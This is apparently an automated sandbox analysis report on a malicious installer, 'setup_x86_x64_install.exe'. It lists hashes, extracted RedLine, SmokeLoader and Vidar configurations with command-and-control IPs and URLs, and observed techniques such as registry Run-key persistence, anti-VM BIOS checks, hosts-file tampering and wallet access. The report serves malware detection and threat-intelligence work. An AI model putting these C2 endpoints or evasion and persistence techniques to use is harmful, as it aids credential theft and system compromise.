Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
1532s -
max time network
28635s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Extracted
redline
newjust
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Modifies system executable filetype association 2 TTPs 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDriveSetup.exe -
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 4968 rundll32.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6624 4968 rundll32.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8068 4968 rundll32.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8500 4968 rundll32.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6464 4968 rundll32.exe 160 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8196 4968 rundll32.exe 160 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral5/memory/1480-270-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/2080-269-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/2080-271-0x0000000000418D3A-mapping.dmp family_redline behavioral5/memory/1480-272-0x0000000000418D26-mapping.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000400000001abf2-170.dat family_socelars behavioral5/files/0x000400000001abf2-149.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 1964 created 4392 1964 WerFault.exe 100 PID 5672 created 1376 5672 WerFault.exe 109 PID 5296 created 4252 5296 WerFault.exe 151 -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral5/memory/3852-502-0x0000000002170000-0x0000000002246000-memory.dmp family_vidar behavioral5/memory/3852-505-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
resource yara_rule behavioral5/files/0x000400000001abe6-122.dat aspack_v212_v242 behavioral5/files/0x000400000001abe6-124.dat aspack_v212_v242 behavioral5/files/0x000400000001abea-127.dat aspack_v212_v242 behavioral5/files/0x000400000001abe5-129.dat aspack_v212_v242 behavioral5/files/0x000400000001abe5-131.dat aspack_v212_v242 behavioral5/files/0x000400000001abea-130.dat aspack_v212_v242 behavioral5/files/0x000400000001abe5-123.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run control.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\RJOPYFHXCNY = "C:\\Program Files (x86)\\Mmx4hv\\i4g4vtj2.exe" control.exe -
Blocklisted process makes network request 47 IoCs
flow pid Process 330 6464 rundll32.exe 665 8720 powershell.exe 824 6532 MsiExec.exe 826 6532 MsiExec.exe 827 6532 MsiExec.exe 828 6532 MsiExec.exe 829 6532 MsiExec.exe 830 6532 MsiExec.exe 831 6532 MsiExec.exe 832 6532 MsiExec.exe 833 6532 MsiExec.exe 834 6532 MsiExec.exe 835 6532 MsiExec.exe 836 6532 MsiExec.exe 837 6532 MsiExec.exe 838 6532 MsiExec.exe 839 6532 MsiExec.exe 840 6532 MsiExec.exe 841 6532 MsiExec.exe 842 6532 MsiExec.exe 843 6532 MsiExec.exe 844 6532 MsiExec.exe 845 6532 MsiExec.exe 846 6532 MsiExec.exe 847 6532 MsiExec.exe 848 6532 MsiExec.exe 849 6532 MsiExec.exe 850 6532 MsiExec.exe 851 6532 MsiExec.exe 852 6532 MsiExec.exe 853 6532 MsiExec.exe 854 6532 MsiExec.exe 855 6532 MsiExec.exe 856 6532 MsiExec.exe 857 6532 MsiExec.exe 858 6532 MsiExec.exe 859 6532 MsiExec.exe 861 6532 MsiExec.exe 862 6532 MsiExec.exe 863 6532 MsiExec.exe 864 6532 MsiExec.exe 865 6532 MsiExec.exe 867 6532 MsiExec.exe 868 6532 MsiExec.exe 869 6532 MsiExec.exe 870 6532 MsiExec.exe 871 6532 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 4860 setup_installer.exe 520 setup_install.exe 2888 Mon178e7a516181.exe 3884 Mon17870faab0.exe 4628 Mon175e6c8b40064b8c8.exe 5008 Mon173a360b525.exe 1376 Mon17bffc2992eb3d.exe 4100 Mon17bbf11fdb575d.exe 988 Mon179f74c0ff3cf1f.exe 3136 Mon1727c156c4abcec.exe 4392 Mon1708beae021a5ff.exe 4180 Mon17afe24e0084db3.exe 4360 Mon174a6c5f1664f.exe 1484 WinHoster.exe 3376 Mon17a0d8ec302e.exe 2160 Mon178d8e5d06822.exe 1872 Mon17bbf11fdb575d.tmp 2120 Mon17bbf11fdb575d.exe 2472 Mon17afe24e0084db3.exe 2972 zhanglijuan-game.exe 2080 Mon1727c156c4abcec.exe 1480 Mon174a6c5f1664f.exe 3444 4197520.exe 4488 5406726.exe 1552 ejmyMi7AtBevIn8DRICZl6av.exe 512 postback.exe 1556 3482271.exe 2152 DownFlSetup110.exe 2132 inst1.exe 1488 7933448.exe 3852 Soft1WW01.exe 4720 41575.exe 3500 chrome.exe 4560 2453573.exe 1152 chrome2.exe 1300 5149335.exe 4296 search_hyperfs_206.exe 4252 setup.exe 4216 msiexec.exe 2972 zhanglijuan-game.exe 1536 Calculator Installation.exe 2648 chrome3.exe 1484 WinHoster.exe 4472 Chrome5.exe 5320 LYCw0J.ExE 5436 kPBhgOaGQk.exe 5144 LzmwAqmV.exe 5408 2954983.exe 5284 5338000.exe 5940 6286259440.exe 6064 4151522.exe 4488 5406726.exe 2196 2367830.exe 5904 5093277.exe 5156 mTeABXpBzcGCUGPGqC7x3nV1.exe 5744 qxC1nsEi42vuuuXTOfADEOqE.exe 1552 ejmyMi7AtBevIn8DRICZl6av.exe 2928 W9xWu_AEnKs623Q9RYQ1dIrL.exe 1372 i9iBfSFpiJLNYdkx4pTJj13W.exe 5912 13DXiLTMa1hLpSFPz4hnS78R.exe 4692 JaCAPd06FlDmrpOxihzFv2Ya.exe 6184 CXGvGSzadJsTx1qTxImyPp7A.exe 6432 wkXv2fTh4gd_QhZD3v2cNXAC.exe 6452 l9hzlz9ZLt7XuMB8ACGsfFI8.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CXGvGSzadJsTx1qTxImyPp7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QS5QO54Pu7CmqPq1QMNVpdP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion u3cRqTdVGtXPgh8ADvnvPDLI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7933448.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5338000.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4151522.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion G_qlYSMI3UpBnqt1rgDYiWfA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EfYzouvnW3iAXodDye6sK70I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EfYzouvnW3iAXodDye6sK70I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion u3cRqTdVGtXPgh8ADvnvPDLI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3482271.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7933448.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion G_qlYSMI3UpBnqt1rgDYiWfA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CXGvGSzadJsTx1qTxImyPp7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QS5QO54Pu7CmqPq1QMNVpdP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3482271.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5338000.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4151522.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Calculator.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon178e7a516181.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Eis8rgwPfplaNhGmdMf5sxxc.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Vyzharogaewi.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Mon179f74c0ff3cf1f.exe -
Loads dropped DLL 64 IoCs
pid Process 520 setup_install.exe 520 setup_install.exe 520 setup_install.exe 520 setup_install.exe 520 setup_install.exe 520 setup_install.exe 1872 Mon17bbf11fdb575d.tmp 2972 zhanglijuan-game.exe 1536 Calculator Installation.exe 1536 Calculator Installation.exe 5664 regsvr32.exe 5664 regsvr32.exe 6196 rundll32.exe 6756 MicrosoftEdge.exe 1536 Calculator Installation.exe 1536 Calculator Installation.exe 1536 Calculator Installation.exe 7264 regsvr32.exe 7832 msiexec.exe 7832 msiexec.exe 696 setup.exe 696 setup.exe 5608 vRPeoOe1mIWiEt7qCOcg_mkL.exe 5608 vRPeoOe1mIWiEt7qCOcg_mkL.exe 5608 vRPeoOe1mIWiEt7qCOcg_mkL.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 5192 setup.exe 5192 setup.exe 5608 vRPeoOe1mIWiEt7qCOcg_mkL.exe 5608 vRPeoOe1mIWiEt7qCOcg_mkL.exe 6872 3HRBsEjn8fsRzwUB_ap1rMWy.tmp 696 setup.exe 696 setup.exe 8052 setup.exe 8052 setup.exe 696 setup.exe 5360 cmd.exe 1016 uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe 1016 uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe 3580 tJWpYBfBdpnOujp6qGKB_GWA.tmp 1016 uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe 1016 uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe 1016 uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe 8056 setup.exe 8056 setup.exe 696 setup.exe 1536 Calculator Installation.exe 4216 Conhost.exe 4216 Conhost.exe 5192 setup.exe 5192 setup.exe 5384 rundll32.exe 5192 setup.exe 7424 Calculator.exe 7424 Calculator.exe 7424 Calculator.exe 5192 setup.exe 6120 V5QkACUZs6HpWtXhCwXQlkbI.exe 7452 installer.exe 7452 installer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x000400000001ac19-330.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2453573.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xanocaejyca.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LYCw0J.ExE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8QS5QO54Pu7CmqPq1QMNVpdP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA adorning.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA search_hyperfs_206.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA l9hzlz9ZLt7XuMB8ACGsfFI8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Qaehoxekile.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Jigecacela.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA zhanglijuan-game.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FVg5dIcYh8MQcezkMZUKRnJw.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA c9ERkf7LMTbBMG3_wz5MOpln.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CXGvGSzadJsTx1qTxImyPp7A.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EfYzouvnW3iAXodDye6sK70I.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA postback.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5338000.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4151522.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LgGY89P792Li7mvFxyF8GrqY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3482271.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EoOquW8c4Vfj_NvcnA6gXyuN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wkXv2fTh4gd_QhZD3v2cNXAC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA u3cRqTdVGtXPgh8ADvnvPDLI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3HRBsEjn8fsRzwUB_ap1rMWy.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ejmyMi7AtBevIn8DRICZl6av.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA G_qlYSMI3UpBnqt1rgDYiWfA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tJWpYBfBdpnOujp6qGKB_GWA.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7933448.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 275 ipinfo.io 277 ipinfo.io 93 freegeoip.app 103 ipinfo.io 119 ip-api.com 97 freegeoip.app 100 freegeoip.app 104 ipinfo.io 105 ipinfo.io 294 ipinfo.io 386 ipinfo.io 96 freegeoip.app 385 ipinfo.io 406 ipinfo.io -
Drops file in System32 directory 22 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-941723256-3451054534-3089625102-1000 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 